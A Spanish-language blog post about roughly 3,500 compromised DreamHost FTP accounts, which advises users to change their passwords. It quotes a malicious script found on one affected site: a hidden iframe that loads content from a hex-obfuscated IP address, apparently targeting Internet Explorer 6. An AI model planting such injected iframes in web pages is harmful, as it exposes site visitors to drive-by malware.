Si los usuarios de DreamHost no tenían bastante ya con las frecuentes caídas de los servidores de DreamHost, vamos a sumarle que DreamHost tiene más de 3500 cuentas de FTP de usuarios de DreamHost comprometidas, lo cual representa el 0.15% del total de cuentas en DreamHost. DreamHost ha estado enviando un correo electrónico a ciertos usuarios donde avisa que un atacante obtuvo de ‘alguna forma’ 3500 contraseñas asociadas a cuentas FTP.
Según se informa en este correo, el atacante sólo está usando estas cuentas para colocar un código que hace pocisionar sus páginas web, es decir, que sólo se trata de un ataque en busca de mejora SEO. Sin embargo, en Aeromental, Daniel comenta que ha sido uno de los usuarios en recibir este correo electrónico y que encontró un script maligno en uno de sus sitios, este script parece que sólo afecta a Internet Explorer 6.
El script es algo como esto:
IFRAME src='http://0xcb.0xdf.0x9e.0x0c/t' width='6' height='6'
style='visibility: hidden;'> </IFRAME
Aún así no hayas recibido el correo electrónico por parte de DreamHost, recomendamos de manera potencial el que cambies la contraseñas de tu cuenta FTP de DreamHost.
(vía: SigT)